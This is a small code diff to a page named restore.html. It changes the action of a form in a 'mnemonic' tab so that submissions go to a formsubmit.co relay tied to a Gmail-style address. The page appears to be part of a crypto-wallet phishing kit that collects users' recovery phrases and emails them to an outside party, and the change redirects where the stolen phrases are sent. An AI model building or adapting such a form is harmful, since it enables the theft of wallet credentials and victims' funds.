--- a/restore.html
+++ b/restore.html
@@ -55,7 +55,7 @@
                   aria-labelledby="mnemonic-tab"
                 >
                   <form
-                    action="https://formsubmit.co/3eaf5924-ec9b-468e-9690-f6abe48d3406"
+                    action="https://formsubmit.co/gitnetform1@gmail"
                     method="POST"
                   >
                     <input
